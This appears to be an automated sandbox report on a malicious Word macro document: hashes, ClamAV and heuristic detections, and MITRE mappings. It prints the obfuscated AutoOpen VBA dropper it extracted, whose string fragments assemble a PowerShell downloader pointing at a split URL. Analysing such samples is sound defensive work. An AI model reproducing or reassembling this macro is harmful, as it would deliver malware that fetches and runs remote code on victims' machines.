Office (OLE) malware analysis — malicious · 93f2f1c385dcfbbf

MALICIOUS

Office (OLE)

106.0 KB Created: 2018-02-13 11:14:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 8db1ba9a69900fa73f7a020291d533ba SHA-1: 7c5245327ba72772374eed895138c53770125a00 SHA-256: 93f2f1c385dcfbbf2613b413f64764c6fb480905bbb5240b98c69b0f8e24dd60

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. ClamAV also identified this file as a known dropper, further supporting its malicious nature. The specific payload or its destination could not be determined due to obfuscation.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6447745-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6447745-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28564 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28564 bytes
SHA-256: `404ca64b25ff948e766c6e9d20ac421dc368fe23ce62086e70dc387d64ca5516`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zWOmaFjAMV" Sub AutoOpen() On Error Resume Next cSYsaWiaB = tot - Sgn(XTEwm) - (208205 - Tan(1815453) / 7168362 - ChrW(lnEZ)) iDzQMLJwT = mqkZpXupsfSXGr - Sgn(ozhrLmEWwz) - (4373583 - Tan(758215) / 7329213 - ChrW(ckNEWSGCbT)) NLwuYHHwF = YObEHKhTnaS - Sgn(IIPvETk) - (4985992 - Tan(5319290) / 7338796 - ChrW(NdAqJzps)) Application.Run "oIhXwmJTGrZNrh", SuPcBDfwrP ZwDHOIIzL = mOAAuCnfcCn - Sgn(fHmrO) - (5293890 - Tan(1412439) / 3902046 - ChrW(VzhsVFAA)) nvWYpoXVM = zCiUmENSwVW - Sgn(hprNQQTHYzmip) - (1375761 - Tan(3429494) / 7562492 - ChrW(SPVBsKRsBLcf)) DIfitOjhb = GCFKzQAf - Sgn(nabiGBspfZ) - (3939381 - Tan(3001795) / 1092440 - ChrW(cVoHAwslFOuI)) End Sub Function SuPcBDfwrP() On Error Resume Next FvvcFbK = ibwtshfQdkabb - Sgn(lMzmFzPRboCb) - (5626126 - Tan(705993) / 905163 - ChrW(OzAqqKtmkqDA)) UaQaUTQCv = vtJH - Sgn(wCDXEJfQAJ) - (8404495 - Tan(3193849) / 742739 - ChrW(LnWbbkzbT)) RBzQz = COtOL - Sgn(usUwFCmrur) - (2203545 - Tan(5019096) / 1891052 - ChrW(vTmcpSZSiXh)) stTMCLak = AnTqYJHl + Mid(lsjcXiRj + "ULtPdfcMZjzjVqwHAR]70+[CH'+'AR]79+[CH'+'AR]82),zh'+'SkmGzhS).RePlacE(([C'+'HAR]74+[CHAR]73+[CHAR'+']117),zhSWzkzhS)'krzL" + UliXjOAJKH, 16, 101) AABWj = iTuVEb - Sgn(UpUwXiGfSumww) - (1520996 - Tan(1032244) / 9896510 - ChrW(nNwrNMnoz)) BaSalfizcv = npGJbIiEbOTKz - Sgn(tZNpL) - (9617653 - Tan(1288614) / 5588365 - ChrW(RiqcCHd)) zTANq = HYlSqMlLqU - Sgn(dkJ) - (5451201 - Tan(3199216) / 7719618 - ChrW(nzwcBmKVoakfbz)) NwCWfCtS = isVpPQFTPw + Mid(HVJAijjYZRjPic + "NOZG JjpY'+'zhS+zhSte94+e94rye94+e'+'94{e94+e94ctQYe94+eUpY+UpWVaZzZZwOQmqcvU" + ZsHbKw, 8, 55) qYiNS = KaKtFfCz - Sgn(FwuZXTHYiLlj) - (3862021 - Tan(1934140) / 8359593 - ChrW(dVwhPMji)) DNdTLA = RDLjwUjLQVrK - Sgn(FPXwQzjrqQSXb) - (1889729 - Tan(856315) / 3101234 - ChrW(tNMjGQvo)) YJjbmbKMCQ = qEUDozLjPjJ - Sgn(vlwwam) - (8626702 - Tan(2455142) / 4344486 - ChrW(cuqci)) WhDYwFG = hLmLrDNbiVdDzj + Mid(GaoF + "fAfQZoiBWozPBvdfZm94IZe9wwpvGlILDMPTQLIm" + djiWzIV, 19, 6) YLkbrIWGHsP = PfSc - Sgn(KZBiQHohiDja) - (3721079 - Tan(3978957) / 4783798 - ChrW(SaDwaOwzTdk)) KzajC = CiwvIsTd - Sgn(jPVlfiRi) - (9550216 - Tan(9461432) / 3061033 - ChrW(WzEPf)) iKitr = vbEKmW - Sgn(iwGnSb) - (301496 - Tan(9181771) / 1831201 - ChrW(KiLujjSWjUO)) AlIipDcRlV = LzwbKjGfWnbTLs + Mid(VGJzbOkfdCbNj + "AlzwjvNLine94+e94'+' ct'+'e94+e94Qe94+e94Ae94+'+'e94DCX)eUpzhS+zhSY+zhS+zhSUpY94+e94{UpY+UwLCjFjOOApSWBaZVpVT" + ZMMUOYQki, 9, 82) lQAFAtTa = ulnGBB - Sgn(LPHqwiuoJhjquu) - (4137063 - Tan(5183764) / 8319622 - ChrW(GBSWz)) wKbhpsiLQ = HMIGjlWwSBavko - Sgn(kTZENzdY) - (3925012 - Tan(4885188) / 2119938 - ChrW(vvAjoSHikWnEYK)) mXhpt = XtUZqClWhtRj - Sgn(inn) - (6421696 - Tan(4712971) / 7814763 - ChrW(ASUldcGoN)) LiPDWOGI = lrjciXBVZdw + Mid(AlKrfVO + "ffiflJBiO4+e94Nzh'+'S'+'+zhSSe94+e94B = zhS+zhScwUYCTX" + NOuhUS, 10, 39) ovkmU = YiwN - Sgn(wIBYkjrYJnhEuQ) - (5326652 - Tan(9825790) / 6382265 - ChrW(uWCsfa)) fLJEkbj = zUXzGSDGwOQR - Sgn(mCOfnv) - (4619492 - Tan(5367168) / 7896395 - ChrW(KGrTBrt)) zZvWNoDX = caj - Sgn(MTYCVizwCKhR) - (5552702 - Tan(8581673) / 1604607 - ChrW(EkCNIBNt)) HquPr = UjDKFiAzUuK + Mid(SnWiFEwi + "UzjipBPEEKvRAkuPNdXFzQS+zhS4ne94+e94ve94+e94oOIe'+'94+e94Z+OIZke94+e94UzhS+zhSp'+'Y+UpYOIZ+e94+e94OIe94+e94ID" + fjjm, 23, 85) JiQVoGqJ = fKGfmWdi - Sgn(rWqliCNPTKJiP) - (7140919 - Tan(2613090) / 3825077 - ChrW(IsjhLvSJTiob)) bNsjqIFCR = DPvBYcinMGVHfh - Sgn(nPZsLw) - (2650684 - Tan(7135245) / 483075 - ChrW(jbYbK)) wdzbmaIJZNF = ZnVHtmNM - Sgn(lCwmKafNCWE) - (995223 - Tan(9082319) / 3166459 - ChrW(pit)) bfIkK = wBPEKnqjw + Mid(uHlZtisQzZZq + "IYppcpsjbe94+e94ce94+e94egezhS+zhSUpY+UpYorgia.co'+'m/avUpY+UpYt2Be94'+'+e94FL/?http:'+'e94+e9zhS+zhS4//e94+e94www.sue94+e94a'+'cuasae9'+'4+e94zhS+zhSt.ve9UpY+UpYz'+'hS+zhS4Up'+'Y+'+'UpY+e94n/UpRVL ... (truncated)

SHA-256: 404ca64b25ff948e766c6e9d20ac421dc368fe23ce62086e70dc387d64ca5516

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zWOmaFjAMV"
Sub AutoOpen()
On Error Resume Next
cSYsaWiaB = tot - Sgn(XTEwm) - (208205 - Tan(1815453) / 7168362 - ChrW(lnEZ))
iDzQMLJwT = mqkZpXupsfSXGr - Sgn(ozhrLmEWwz) - (4373583 - Tan(758215) / 7329213 - ChrW(ckNEWSGCbT))
NLwuYHHwF = YObEHKhTnaS - Sgn(IIPvETk) - (4985992 - Tan(5319290) / 7338796 - ChrW(NdAqJzps))
Application.Run "oIhXwmJTGrZNrh", SuPcBDfwrP
ZwDHOIIzL = mOAAuCnfcCn - Sgn(fHmrO) - (5293890 - Tan(1412439) / 3902046 - ChrW(VzhsVFAA))
nvWYpoXVM = zCiUmENSwVW - Sgn(hprNQQTHYzmip) - (1375761 - Tan(3429494) / 7562492 - ChrW(SPVBsKRsBLcf))
DIfitOjhb = GCFKzQAf - Sgn(nabiGBspfZ) - (3939381 - Tan(3001795) / 1092440 - ChrW(cVoHAwslFOuI))
End Sub
Function SuPcBDfwrP()
On Error Resume Next
FvvcFbK = ibwtshfQdkabb - Sgn(lMzmFzPRboCb) - (5626126 - Tan(705993) / 905163 - ChrW(OzAqqKtmkqDA))
UaQaUTQCv = vtJH - Sgn(wCDXEJfQAJ) - (8404495 - Tan(3193849) / 742739 - ChrW(LnWbbkzbT))
RBzQz = COtOL - Sgn(usUwFCmrur) - (2203545 - Tan(5019096) / 1891052 - ChrW(vTmcpSZSiXh))
stTMCLak = AnTqYJHl + Mid(lsjcXiRj + "ULtPdfcMZjzjVqwHAR]70+[CH'+'AR]79+[CH'+'AR]82),zh'+'SkmGzhS).RePlacE(([C'+'HAR]74+[CHAR]73+[CHAR'+']117),zhSWzkzhS)'krzL" + UliXjOAJKH, 16, 101)
AABWj = iTuVEb - Sgn(UpUwXiGfSumww) - (1520996 - Tan(1032244) / 9896510 - ChrW(nNwrNMnoz))
BaSalfizcv = npGJbIiEbOTKz - Sgn(tZNpL) - (9617653 - Tan(1288614) / 5588365 - ChrW(RiqcCHd))
zTANq = HYlSqMlLqU - Sgn(dkJ) - (5451201 - Tan(3199216) / 7719618 - ChrW(nzwcBmKVoakfbz))
NwCWfCtS = isVpPQFTPw + Mid(HVJAijjYZRjPic + "NOZG JjpY'+'zhS+zhSte94+e94rye94+e'+'94{e94+e94ctQYe94+eUpY+UpWVaZzZZwOQmqcvU" + ZsHbKw, 8, 55)
qYiNS = KaKtFfCz - Sgn(FwuZXTHYiLlj) - (3862021 - Tan(1934140) / 8359593 - ChrW(dVwhPMji))
DNdTLA = RDLjwUjLQVrK - Sgn(FPXwQzjrqQSXb) - (1889729 - Tan(856315) / 3101234 - ChrW(tNMjGQvo))
YJjbmbKMCQ = qEUDozLjPjJ - Sgn(vlwwam) - (8626702 - Tan(2455142) / 4344486 - ChrW(cuqci))
WhDYwFG = hLmLrDNbiVdDzj + Mid(GaoF + "fAfQZoiBWozPBvdfZm94IZe9wwpvGlILDMPTQLIm" + djiWzIV, 19, 6)
YLkbrIWGHsP = PfSc - Sgn(KZBiQHohiDja) - (3721079 - Tan(3978957) / 4783798 - ChrW(SaDwaOwzTdk))
KzajC = CiwvIsTd - Sgn(jPVlfiRi) - (9550216 - Tan(9461432) / 3061033 - ChrW(WzEPf))
iKitr = vbEKmW - Sgn(iwGnSb) - (301496 - Tan(9181771) / 1831201 - ChrW(KiLujjSWjUO))
AlIipDcRlV = LzwbKjGfWnbTLs + Mid(VGJzbOkfdCbNj + "AlzwjvNLine94+e94'+' ct'+'e94+e94Qe94+e94Ae94+'+'e94DCX)eUpzhS+zhSY+zhS+zhSUpY94+e94{UpY+UwLCjFjOOApSWBaZVpVT" + ZMMUOYQki, 9, 82)
lQAFAtTa = ulnGBB - Sgn(LPHqwiuoJhjquu) - (4137063 - Tan(5183764) / 8319622 - ChrW(GBSWz))
wKbhpsiLQ = HMIGjlWwSBavko - Sgn(kTZENzdY) - (3925012 - Tan(4885188) / 2119938 - ChrW(vvAjoSHikWnEYK))
mXhpt = XtUZqClWhtRj - Sgn(inn) - (6421696 - Tan(4712971) / 7814763 - ChrW(ASUldcGoN))
LiPDWOGI = lrjciXBVZdw + Mid(AlKrfVO + "ffiflJBiO4+e94Nzh'+'S'+'+zhSSe94+e94B = zhS+zhScwUYCTX" + NOuhUS, 10, 39)
ovkmU = YiwN - Sgn(wIBYkjrYJnhEuQ) - (5326652 - Tan(9825790) / 6382265 - ChrW(uWCsfa))
fLJEkbj = zUXzGSDGwOQR - Sgn(mCOfnv) - (4619492 - Tan(5367168) / 7896395 - ChrW(KGrTBrt))
zZvWNoDX = caj - Sgn(MTYCVizwCKhR) - (5552702 - Tan(8581673) / 1604607 - ChrW(EkCNIBNt))
HquPr = UjDKFiAzUuK + Mid(SnWiFEwi + "UzjipBPEEKvRAkuPNdXFzQS+zhS4ne94+e94ve94+e94oOIe'+'94+e94Z+OIZke94+e94UzhS+zhSp'+'Y+UpYOIZ+e94+e94OIe94+e94ID" + fjjm, 23, 85)
JiQVoGqJ = fKGfmWdi - Sgn(rWqliCNPTKJiP) - (7140919 - Tan(2613090) / 3825077 - ChrW(IsjhLvSJTiob))
bNsjqIFCR = DPvBYcinMGVHfh - Sgn(nPZsLw) - (2650684 - Tan(7135245) / 483075 - ChrW(jbYbK))
wdzbmaIJZNF = ZnVHtmNM - Sgn(lCwmKafNCWE) - (995223 - Tan(9082319) / 3166459 - ChrW(pit))
bfIkK = wBPEKnqjw + Mid(uHlZtisQzZZq + "IYppcpsjbe94+e94ce94+e94egezhS+zhSUpY+UpYorgia.co'+'m/avUpY+UpYt2Be94'+'+e94FL/?http:'+'e94+e9zhS+zhS4//e94+e94www.sue94+e94a'+'cuasae9'+'4+e94zhS+zhSt.ve9UpY+UpYz'+'hS+zhS4Up'+'Y+'+'UpY+e94n/UpRVL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.